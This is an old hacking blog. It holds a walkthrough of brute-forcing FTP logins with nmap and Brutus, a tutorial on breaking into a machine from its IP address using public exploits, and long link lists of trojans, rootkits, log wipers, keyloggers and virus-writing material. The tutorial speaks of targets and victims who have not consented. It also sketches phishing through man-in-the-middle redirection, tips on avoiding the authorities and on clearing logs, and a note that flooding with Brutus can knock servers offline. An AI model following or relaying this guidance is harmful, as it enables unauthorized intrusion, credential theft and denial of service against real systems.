REALMS OF HACKING TRICKS

how to accomplish a brute force attack

2009-04-10T12:23:00.000-07:00

This article is designed to demonstrate how to accomplish a brute force attack, and what it looks like from the receiving end. Brute force means password guessing. This can only feasibly be accomplished with the aid of good target reconnaissance and some automated programs. While it is very easy to write your own brute force program, there are several available for free online. I find Brutus to be one of the best brute force tools. You can find it at Hoobie.net.

The first step in a brute force attack (or for that matter, any attack) is target enumeration. This is the process by which we find where and how a target is vulnerable. I use NMAP for almost all of my initial cursory scans of networks. Lets use the target of my own desktop server and run an NMAP scan to find out what we have to play with. The output from my scan follows:

nmap -sS -O 216.25.200.135

Starting nmap V. 2.30BETA17 by fyodor@insecure.org (
http://www.insecure.org/nmap/ )
Interesting ports on ip-216-25-200-135.covad.dsl.fcc.net
(216.25.200.135):
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1026/tcp open nterm
1031/tcp open iad2

TCP Sequence Prediction: Class=random positive increments
Difficulty=7635 (Worthy challenge)
Remote operating system guess: Windows 2000 RC1 through final release

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second

Ok, so weÃ¢â‚¬â„¢ve got several services to choose from on this target. The first one that catches my eye is FTP. We can use this to brute force passwords, and we can use smtp to check for user accounts. Now the fun begins. IÃ¢â‚¬â„¢ll first try ftp to find if anonymous ftp is enabled (which could potentially make my task a lot easier, there are rare computers with completely open upload/download ftp servers without strong restrictions (allowing you to upload and download to the web root folder)).

C:\>ftp 216.25.200.135
Connected to 216.25.200.135.
220 WIN2KSERVER Microsoft FTP Service (Version 5.0).
User (216.25.200.135:(none)): anonymous
331 Password required for anonymous.
Password:foo@nowhere.com
530 User anonymous cannot log in.
Login failed.
ftp> quit
221 Fuck off!

It seems that anonymous ftp isnÃ¢â‚¬â„¢t enabled, and not only that the server is quite rude when I leave. The server did give some confirmation that it is running Windows NT, or in this case Windows 2000 (dead giveaway in the machineÃ¢â‚¬â„¢s name Ã¢â‚¬ËœWIN2KSERVERÃ¢â‚¬â„¢). WeÃ¢â‚¬â„¢ll try the SMTP server now to check for user names.

220 WIN2KSERVER Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966
ready at Fri, 22 Jun 2001 09:08:49 Ã¢â‚¬â€œ0400
vrfy smellydell
252 2.1.5 Cannot VRFY user, but will take message for smellydell
vrfy administrator
252 2.1.5 Cannot VRFY user, but will take message for administrator

well, thereÃ¢â‚¬â„¢s no use in verifying anyone on this server as it seems that the server will give the same message for real and bogus accounts (all NT servers have an Ã¢â‚¬ËœadministratorÃ¢â‚¬â„¢ account, in much the same way that *nix have root accounts). The Ã¢â‚¬ËœexpnÃ¢â‚¬â„¢ command didnÃ¢â‚¬â„¢t work at all on this server (replied with Ã¢â‚¬Ëœunknown commandÃ¢â‚¬â„¢ at expn postmaster). So at this point IÃ¢â‚¬â„¢m S.O.L., but some machines will give a very good list of users and or active accounts using the smtp server.

Ok, so IÃ¢â‚¬â„¢m off to brute forcing. The first thing I do is fire up Brutus.

Screenshot of brutus at startup

Next IÃ¢â‚¬â„¢ll have to modify my users list (found in users.txt in the Brutus directory) to include users I suspect to be on an NT server. NT always has a Ã¢â‚¬ËœGuestÃ¢â‚¬â„¢ account and an Ã¢â‚¬ËœAdministratorÃ¢â‚¬â„¢ account. IÃ¢â‚¬â„¢ll add a few more guesses. In the end my users list looks like this:

A text file list of users

The next step is to fire Brutus at the target, when configured for an ftp attack, Brutus appears thus:

Configuring brutus

YouÃ¢â‚¬â„¢ll notice I set the timeout higher than the default. Brutus nicely circumvents connection limits by creating new connections for every request. This is useful because some servers will cut your connection after 3 bad guesses at passwords. Brutus uses the targets ability to take multiple ftp requests and creates a new request for every guess (I have set the program to make 10 requests simultaneously). The timeout is the lag time that the program will allow before it makes a new request. If you donÃ¢â‚¬â„¢t set this high enough you are likely to flood the target and either crash its server, or simply hang Brutus. You can use a really high connection and low timeout rate as an effective DoS attack that will knock weak servers completely off the net.

So now IÃ¢â‚¬â„¢ll fire Brutus at the target. IÃ¢â‚¬â„¢m using the default password list that comes with the program, but there are several larger, and more complete word lists available online. What Brutus will do is try every username listed in the users file with every password in the word list (and can even generate its own random word list to include all combinations of letters, characters, and numbers). Remember that most passwords are 8 characters long, so its usually not worthwhile to try and brute force very short passwords. HereÃ¢â‚¬â„¢s what Brutus looks like in action:

Screenshot of brutus attacking a target

Now, the downside to brute forcing is that it is extremely noisy, and even the worst sysadmin should notice it. During my demonstration my server immediately popped an alert that the system log was full. A quick examination of the system log reveals the problem immediately:

Screenshot of an NT event log

All those warnings you see are bad FTP login attempts. A double click on the alert shows:

Screenshot of an event log detail showing the brute force attack

It isnÃ¢â‚¬â„¢t hard to figure out exactly what is going on. Even more disturbing is the log file left behind. HereÃ¢â‚¬â„¢s a snippit:

13:30:18 216.25.200.135 [5]USER admin 331
13:30:18 216.25.200.135 [6]USER admin 331
13:30:18 216.25.200.135 [7]USER admin 331
13:30:18 216.25.200.135 [8]USER admin 331
13:30:18 216.25.200.135 [9]USER admin 331
13:30:18 216.25.200.135 [10]USER admin 331
13:30:18 216.25.200.135 [11]USER admin 331
13:30:18 216.25.200.135 [12]USER admin 331
13:30:18 216.25.200.135 [13]USER admin 331
13:30:18 216.25.200.135 [4]PASS - 530
13:30:18 216.25.200.135 [14]USER admin 331
13:30:18 216.25.200.135 [5]PASS - 530
13:30:18 216.25.200.135 [6]PASS - 530
13:30:18 216.25.200.135 [7]PASS - 530
13:30:18 216.25.200.135 [8]PASS - 530
13:30:18 216.25.200.135 [9]PASS - 530
13:30:18 216.25.200.135 [10]PASS - 530
13:30:18 216.25.200.135 [11]PASS - 530
13:30:18 216.25.200.135 [15]USER admin 331
13:30:18 216.25.200.135 [16]USER admin 331

Not only do you notice all the tries for the same account, but you can tell it is an automated attempt to brute force because the times of the attempts are so close together (60 or so attempts a second). Even more damning is that my IP address is logged all over the huge log file. Its not hard to spot me or figure out what IÃ¢â‚¬â„¢m attempting to do. Be warned if you attempt a brute force that you are probably going to get notice.

Now, I happened to be successful on this attempt and got on username and password. The results are displayed in Brutus under the Ã¢â‚¬ËœPositive Authentication ResultsÃ¢â‚¬â„¢ window:

Screenshot showing brutus successfully identifying login information

You can see the username Ã¢â‚¬ËœuserÃ¢â‚¬â„¢ and password Ã¢â‚¬ËœcharlesÃ¢â‚¬â„¢ worked on the server. Lets try them out:

C:\>ftp 216.25.200.135
Connected to 216.25.200.135.
220 WIN2KSERVER Microsoft FTP Service (Version 5.0).
User (216.25.200.135:(none)): user
331 Password required for user.
Password: charles
230-Fuck you!
230 User user logged in.
ftp>

Boom, and its just that easy. Now that IÃ¢â‚¬â„¢m in my first step should be to attempt to clean up the traces of my attack (i.e. the log files and system event logs). Accomplishing this task takes more explanation than I have time for here, but hopefully you get the idea.

If nothing else, this short article should show you the value of good passwords. If I hadnÃ¢â‚¬â„¢t set up the account Ã¢â‚¬ËœuserÃ¢â‚¬â„¢ with such a crappy password this attack most likely would have been unsuccessful. See my article on passwords for a good run down of how to pick a good password to keep your accounts safe from brute force attempts.

Tutorial: How to hack with a ip address

2009-04-10T12:20:00.000-07:00

Tutorial: How to hack with a ip address

So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown

In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage
__________________________________________________ _______________
**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**

Ulitimate hack pack

2009-04-10T12:05:00.000-07:00

Ulitimate hack pack

All Hacking Resources!

2009-04-10T11:55:00.000-07:00

All Hacking Resources!

Here:
Security Links

Ã‚Â§ A totally HUGE security archive http://neworder.box.sk/
Ã‚Â§ THE best security forums http://www.security-forums.com/
Ã‚Â§ Current and archived exploits http://www.securiteam.com/exploits/
Ã‚Â§ 'Underground' search engine http://www.warez.com/
Ã‚Â§ Default loginÃ¢â‚¬â„¢s for all sorts of devices http://www.governmentsecurity.org
Ã‚Â§ One of the top mainstream security sites http://www.securityfocus.com/
Ã‚Â§ TESO Computer security http://teso.scene.at/
Ã‚Â§ Asian security group, lots of advisories http://www.shadowpenguin.org/
Ã‚Â§ w00w00 Security development http://www.w00w00.org/
Ã‚Â§ USSR a strong security group http://www.ussrback.com/
Ã‚Â§ Good all around security site http://www.packetstormsecurity.nl
Ã‚Â§ Exploits, backdoors, Trojans and more http://www.tlsecurity.net
Ã‚Â§ SANS Security Institute with articles on EVERYTHING http://www.sans.org/
Ã‚Â§ A Fairly immense WWW security FAQ http://www.w3.org/Security/Faq/
Ã‚Â§ Computer Security Encyclopedia http://www.itsecurity.com/
Ã‚Â§ Java Security information http://java.sun.com/security/
Ã‚Â§ Help Net Security http://www.net-security.org/
Ã‚Â§ Security Search Engine http://searchsecurity.techtarget.com/
Ã‚Â§ Free BSD security information http://www.freebsd.org/security/
Ã‚Â§ Netscape security information http://home.netscape.com/security/
Ã‚Â§ Linux security community centre http://www.linuxsecurity.com/
Ã‚Â§ Dutch Security Information Network http://www.dsinet.org/
Ã‚Â§ Network Security Library http://secinf.net/
Ã‚Â§ Infamous happy hacker http://www.happyhacker.org/
Ã‚Â§ A once great site from a white hat hacker http://www.antionline.com/
Ã‚Â§ Infosec papers and articles http://www.infosecwriters.com/
Ã‚Â§ Security/privacy/crypto software archive http://www.wiretapped.net/
Ã‚Â§ ISB - Info Sec Bible http://www.securityflaw.com/bible
Ã‚Â§ Security toolÃ¢â‚¬â„¢s Http://foundstone.com/
http://securitystats.com

Privacy and Anonymity

ÃƒÂ¿ All about privacy http://www.privacy.net
ÃƒÂ¿ Anonymity, privacy and security http://www.stack.nl/~galactus/remailers/
ÃƒÂ¿ Free, anonymous web surfing http://www.anonymizer.com/
ÃƒÂ¿ IDSecure service http://www.idzap.com/
ÃƒÂ¿ News, information and action http://www.privacy.org/
ÃƒÂ¿ Sam Spade Tools http://www.samspade.org/t/
ÃƒÂ¿ International PGP homepage http://www.pgpi.org
ÃƒÂ¿ Encryptable web-mail http://www.hushmail.com/
ÃƒÂ¿ Anonymity software http://www.skuz.net/potatoware/
ÃƒÂ¿ REALLY delete your data http://www.cs.auckland.ac.nz/~pgut001/pubs/
ÃƒÂ¿ Anonymous access http://www.safeproxy.org/
ÃƒÂ¿ Web privacy http://www.rewebber.de/
ÃƒÂ¿ A list of web anonymisers http://mikhed.narod.ru/

Cryptography & Encryption

ÃƒÂ¦ All about RSA http://www.rsasecurity.com/
ÃƒÂ¦ Cryptography Archives http://www.kremlinencrypt.com/
ÃƒÂ¦ Cryptography links http://cryptography.org/freecryp.htm
ÃƒÂ¦ Cryptography Info http://world.std.com/~franl/crypto/
ÃƒÂ¦ DriveCrypt http://www.e4m.net/
ÃƒÂ¦ CCIPS http://www.cybercrime.gov/crypto.html
ÃƒÂ¦ Cryptography resource http://www.crypto.com/
ÃƒÂ¦ Bruce Schneier's operation http://www.counterpane.com/
ÃƒÂ¦ Huge Crypto archive http://www.cryptome.org
ÃƒÂ¦ A list of Crypto links http://www.security-forums.com/crypto

Source: http://www.darknet.org.uk/

There could be dead links among those; I got the list from the source above.

The rest of the story
Viruses /Trojans & Firewalls

Ã‚Â¿ Trojan archive http://packetstormsecurity.nl/trojans/
Ã‚Â¿ Up to date Trojan archive http://www.trojanforge.net/
Ã‚Â¿ Fearless, everything Trojan http://www.areyoufearless.com/
Ã‚Â¿ A good archive with info on each one http://www.dark-e.com
Ã‚Â¿ (I'm a moron)'s official Home Page http://www.(I'm a moron).net/
Ã‚Â¿ The BO2k project http://bo2k.sourceforge.net/
Ã‚Â¿ Another comprehensive Trojan archive http://www.tlsecurity.net/amt.htm
Ã‚Â¿ Home of BackOrifice http://www.cultdeadcow.com/
Ã‚Â¿ Huge Trojan removal database http://www.anti-trojan.org/
Ã‚Â¿ Excellent Anti-Viral software and Virii Database http://www.sophos.com/
Ã‚Â¿ Mcafee's Searchable Virus Information Library http://vil.mcafee.com/
Ã‚Â¿ Firewall Guide http://www.firewallguide.com/
Virus Writing
http://vx.netlux.org/lib/static/vdat/tutorial.htm

Nice find Strader...
Ã‚Â¿ Firewall FAQ http://www.interhack.net/pubs/fwfaq/
Ã‚Â¿ Firewall How To http://www.grennan.com/Firewall-HOWTO.html
Ã‚Â¿ Squid http://www.squid-cache.org/
Ã‚Â¿ Excellent virus news and info http://www.antivirus-online.de/english/
Ã‚Â¿ The ULTIMATE IPTables resource http://www.linuxguruz.org/iptables/

Programming

PHP IDE http://www.phpide.de/
ÃƒÂ§ Scripts, Source and Books http://www.scriptsearch.com/
ÃƒÂ§ Java & Internet Glossary http://www.mindprod.com/jgloss.html
ÃƒÂ§ Java homepage http://java.sun.com/
ÃƒÂ§ Absolute Java FAQ http://www.javafaq.nu/
ÃƒÂ§ Thinking in Java http://www.mindview.net/Books/TIJ/
ÃƒÂ§ JavaScript Resource http://www.javascript.com
ÃƒÂ§ JavaScripts,tutorials & references http://javascript.internet.com/
ÃƒÂ§ MySQL home http://www.mysql.com
ÃƒÂ§ PostgreSQL home http://www.postgresql.org/
ÃƒÂ§ PHP home page http://www.programmersheaven.com/
ÃƒÂ§ PHP from hotscripts http://www.hotscripts.com/PHP/
ÃƒÂ§ PHP resource index http://php.resourceindex.com/
ÃƒÂ§ PHP FAQ's http://www.faqts.com/
ÃƒÂ§ PHP Developer resources http://www.phpbuilder.com/
ÃƒÂ§ Building dynamic sites with PHP http://www.phpwizard.net
ÃƒÂ§ PHP Developer network http://www.evilwalrus.com/
ÃƒÂ§ PHP Tutorials and more http://www.thescripts.com/serversidescripting/php
ÃƒÂ§ PHP Resource list http://www.security-forums.com/forum/php
ÃƒÂ§ ASPTear http://www.alphasierrapapa.com/IisD...nents/AspTear/
ÃƒÂ§ ASP Codes and techniques http://www.asptoday.com/
ÃƒÂ§ ASP, HTML, SQL and more http://www.w3schools.com/
ÃƒÂ§ Think ASP think... http://www.4guysfromrolla.com/
ÃƒÂ§ ASP 101 http://www.asp101.com/
ÃƒÂ§ ASP developers site http://haneng.com/
ÃƒÂ§ PERL Archive http://www.perlarchive.com/
ÃƒÂ§ PERL tutorials http://www.perlmonks.org/index.pl?node=Tutorials
ÃƒÂ§ Old school PERL programming http://www.cgi101.com/
ÃƒÂ§ Windows programming tools http://www.programmerstools.org/
ÃƒÂ§ Python homepage http://www.python.org/
ÃƒÂ§ Object Oriented Programming http://www.oopweb.com/
ÃƒÂ§ XML 101 http://www.xml101.com
ÃƒÂ§ Dev-X XML zone http://www.devx.com/xml/
ÃƒÂ§ Programmers Heaven http://www.programmersheaven.com/
ÃƒÂ§ Loads of tutorials http://www.echoecho.com
ÃƒÂ§ Plenty of Web Development scripts http://www.hotscripts.com
ÃƒÂ§ Code for everything http://www.planet-source-code.com/
ÃƒÂ§ The definitive Assembly resource http://webster.cs.ucr.edu/ASM
ÃƒÂ§ C Course http://www.strath.ac.uk/IT/Docs/Ccourse/
ÃƒÂ§ Another good C course http://www.eskimo.com/~scs/cclass/notes/top.html
'Legal' Hacking

ÃƒÂ Zebulun http://www.cyberarmy.com/zebulun/
ÃƒÂ Hack me http://loginmatrix.com/hackme/
ÃƒÂ Try2Hack http://www.try2hack.nl/
ÃƒÂ Hack3r/Roothack http://roothack.org/
ÃƒÂ Pull The Plug http://www.pulltheplug.com/

News Groups

A great source of information, discussion and answers to questions
Depending how you put them

ÃƒÂ± alt.hacking.
ÃƒÂ± alt.binaries.hacking.beginner.
ÃƒÂ± alt.computer.security.
ÃƒÂ± alt.security.
ÃƒÂ± alt.os.security.
ÃƒÂ± alt.security.pgp.
ÃƒÂ± alt.security.pgp.patches.
ÃƒÂ± comp.os.linux.security.
ÃƒÂ± comp.os.ms-windows.nt.admin.security.
ÃƒÂ± comp.security.unix.
ÃƒÂ± comp.security.pgp.backdoors.
ÃƒÂ± comp.security.unix.
ÃƒÂ± microsoft.public.security.
ÃƒÂ± microsoft.public.sqlserver.security.
ÃƒÂ± microsoft.public.win2000.security.

tools, google it:

Tools

Ã‚Â» THE ultimate port scanner nmap.
Ã‚Â» The one and only NT password cracker L0phtcrack.
Ã‚Â» Get the latest version of john the ripper.
Ã‚Â» Windows process listener Inzider.
Ã‚Â» The best packet assembler/analyzer hping.
Ã‚Â» Hackers swiss army knife netcat.
Ã‚Â» A tool for network monitoring and data acquisition TCPDump.
Ã‚Â» The ONLY packet sniffer Ethereal.
Ã‚Â» An active reconnaissance network security tool Firewalk.
Ã‚Â» Grep your network traffic NGrep.
Ã‚Â» NIDS tester from NIDSbench fragrouter.
Ã‚Â» The best OS fingerprinter Xprobe.
Ã‚Â» Port mapper fport.
Ã‚Â» File Integrity checker Tripwire.
Ã‚Â» Check for rootkits chkrootkit.
Ã‚Â» OSS instrusion detection Snort.
Ã‚Â» Security Scanner Nessus.
Ã‚Â» TCP/IP Toolkit Paketto.

Nice find Strader........

Hackers Manifesto
http://www.infowar.com/forums/showthread...eadid=1162

"don't do anything illegal"

Pratice:
http://www.scifi.pages.at/hackits/
(Thanks newbie)

http://www.hackerslab.org/eorg/
(thanks newbie)

http://www.learntohack.org/
(thanks newbie)

http://neworder.box.sk/codebox.links.php?key=36581
(Thanks Net Buster)

http://www.hackthissite.org/
(thanks 55)

Programs applications and other need tools

Browsers
Mozilla Firefox 9.1
http://www.mozilla.org/products/firefox/
Opera
http://www.opera.com/
Netscape 7.1
http://channels.netscape.com/ns/browsers/download.jsp

Anti Virus programs Free
Avast
http://www.avast.com/
AVG
http://www.grisoft.com/us/us_dwnl_free.php
Free antivirus listing page
http://www.freebyte.com/antivirus/

Anti Trojan applications
http://www.emsisoft.com/en/software/free/

Firewalls free
Zone labs
http://www.zonelabs.com/store/conte...reeDownload.jsp
Sygate
http://smb.sygate.com/products/spf_standard.htm
Outpost
http://www.agnitum.com/download/
Kerio
http://www.kerio.com/us/kpf_download.html

Test sites for firewall security
Pcflank
http://www.pcflank.com/
Gibson Research Corporation
http://www.grc.com/default.htm

Misc. sites that have been posted over the years
How to read NETSTAT Ã¢â‚¬â€œan
http://www.geocities.com/merijn_bel.../netstatan.html
Dshield Distributed Intrusion Detection System
http://www.dshield.org/index.php
Hackers watch
http://www.hackerwatch.org/
TCP/ IP Ports list
http://www.chebucto.ns.ca/~rakerman/port-table.html
Network Tools
http://lists.gpick.com/pages/Network_Tools.htm
Hacking text files (older stuff but still useful )\
http://www.textfiles.com/hacking/INTERNET/
Beta News
http://www.betanews.com/
GIF works
http://www.gifworks.com/
Secunia Security pages virus alerts and such
http://secunia.com/ multiple_browse...ty_te
st/

Anti spyware apps
Spyware blaster
http://www.javacoolsoftware.com/
Spybot S&D
http://www.pcworld.com/downloads/fi...id,22262,00.asp
Spyware guard
http://www.javacoolsoftware.com/spywareguard.html
Adware
http://www.lavasoftusa.com/software/adaware/

Here are some tools posted by my friend Splabster(thank you for taking the time typing those tools) :

General System & Network Probing:

Sam Spade http://www.samspade.org/ssw
Online tools http://www.network-tools.com
Online tool http://visualroute.visualware.com
Online tool http://www.norid.no/domenenavnbaser/domreg-alpha.html
Nmap http://www.nmap.org
Scanline http://www.foundstone.com
SuperScan http://www.foundstone.com
Icmpenum http://razor.bindview.com/tools/des...num_readme.html
Snscan http://www.foundstone.com
Ethereal http://www.ethereal.com
Ettercap http://ettercap.sourceforge.net
Xprobe2 http://www.sys-security.com/html/projects/X.html
Hping2 http://www.hping.org/
SQLping http://www.sqlsecurity.com/scripts.asp
Amap http://www.thc.org/releases.php
Tcp Traceroute http://michael.toren.net/code/tcptraceroute
VisualRoute http://www.visualware.com/visualroute/index.html

Enumerating & Compromising Windows

Netcat http://www.atstake.com/research/tools/index.html
Zebedee http://www.winton.org.uk/sebedee/
Desproxy http://desproxy.courceforge.net/
Winfo http://ntsecurity.nu/toolbox/winfo
enum http://razor.bindview.com/tools/des...num_readme.html
Ldp LDAP query tool available in the windows 2000 server cd-rom
DumpSec http://www.somarsoft.com/
Userdump http://www.hammerofgod.com/download.htm
NTFSdos http://www.sysinternals.com/ntw2k/freeware/NTFDOS.shtml
Chntpw http://home.eunet.no/~pnordahl/ntpasswd/
PWDump3 http://www.polivec.com/pwdump3.html
Lsadump2 http://razor.bindview.com/tools/index.shtml
PipeUpAdmin http://content.443.ch/pub/security/...peup/W2KPipeUp/
Psexec http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Ettercap address above
Brutus http://www.hoobie.net/brutus/index.html
Hydra http://www.thc.org/releases.php
John http://www.openwall.com/john
VNCcrack http://www.phenoelit.de/fr/tools.html
Cain & Abel http://www.oxid.it/projects.html
ClearLogs http://www.ntsecurity.nu/toolbox/
WinZapper http://www.ntsecurity.nu/toolbox/
SQLdict http://www.ntsecurity.nu/toolbox/sqldict

Enumerating & Compromising UNIX

Netcat
Zebedee
Desproxy
Ettercap
Xscan http://packetstormsecurity.nl/Exploit_Code_Archive/
Xwhatchwin http://www.deter.com/unix/software/xwatchwin.tgz
Xkey http://www.deter.com/unix/software/xkey.c
Xspy http://www.deter.com/unix/software/xspy-1.0c.tgz
YPX http://www.deter.com/unix/software/ypx.sh.gz
Hunt http://lin.fsid.cvut.cz/~kra/index.html#HUNT
John
Brutus
Hydra
VNCcrack
SQLdict
Zap3 http://packetstormsecurity.nl/UNIX/...ion/log-wipers/

Enumerating & Compromising Novell

Pandora http://www.nmrc.org/project/pandora/index.html
On-site Admin http://www.environmental-center.com/freeware/onsite.htm
NCPQuery http://razor.bindview.com/tools/index.shtml

Enumerating & Compromising Wireless

Netstumbler http://www.netstumbler.com
Kismet http://www.kismetwireless.net/download.shtml
kisMac (for mac users) http://www.binaervarianz.de/projekt...ac/download.php
Airsnort http://airsnort.shmoo.com/
Airtraf http://www.elixar.com/index.html
SMAC http://www.klcconsulting.net/smac
Accessories http://www.fab-corp.com

General System & Network Vulnerability Checking

Nessus http://www.nessus.org
SARA http://www-arc.com/products.shtml
Nikto http://www.cirt.net/code/nikto.shtml

System Forensics Tools

Vision http://www.foundstone.com/knowledge...esc/vision.html
ListDLLs http://www.sysinternals.com/ntw2k/f.../listdlls.shtml
Process Explorer http://www.sysinternals.com/ntw2k/f...e/procexp.shtml
Coroner's Toolkit http://porcupine.org/forensics/tct.html
LADS http://www.sysinternals.com/ntw2k/f.../listdlls.shtml
Chkrootkit http://www.chkrootkit.org/
WinHex http://www.winhex.com/winhex/index-m.html
Active @ Undelete http://www.active-undelete.com/

Web Hacking tools

Black Widow http://www.softbytelabs.com/Frames.html
Web Sleuth http://sandsprite.com/Sleuth
Wfetch http://support.microsoft.com/defaul...B;en-us;q284285
Tsql http://www.aspalliance.com/mtgal/source_code/tsql.exe
Spike Proxy http://www.immunitysec.com/spike.html

Remote Command Shell/Remote Access Trojans/Rootkits

(I'm a moron) Trojan http://(I'm a moron).net/
Barok active Trojan http://www.thenewbiesarea.com/trojans.shtml
AckCmd backdoor http://ntsecurity.ni/toolbox/
Tini backdoor http://ntsecurity.ni/toolbox/
Psexec r-shell http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Rwwwshell r-shell http://www.thc.org/releases/rwwwshell-2.0.pl.gz
LRK5 rootkit http://www.hackersplayground.org/tools.html
Knark 2.4 rootkit http://www.hackersplayground.org/tools.html

Miscellaneous Tools

Fragrouter http://packetstorm.widexs.nl/UNIX/I.../nidsbench.html
Stunnel http://www.stunnel.org
WinRelay http://www.ntsecurity.nu/toolbox/
Fpipe http://www.foundstone.com/resources/freetools.htm
Tight VNC http://www.tightvnc.com
FileGateway http://www.steelbytes.com
Remote Anything http://remote-anything.com/en/ra_index.htm
TinyWeb http://www.ritlabs.com/tinyweb/index.html
IKS 200 key logger http://www.amecisco.com/index.htm
KLogger http://www.ntsecurity.nu/toolbox/
ShowWin http://www.foundstone.com/knowledge/free_tools.html
KEYhatcher http://www.keykatcher.com/howit.htm
Hex Editors http://www.expertcomsoft.com
http://www.winhex.com/winhex/index-m.html
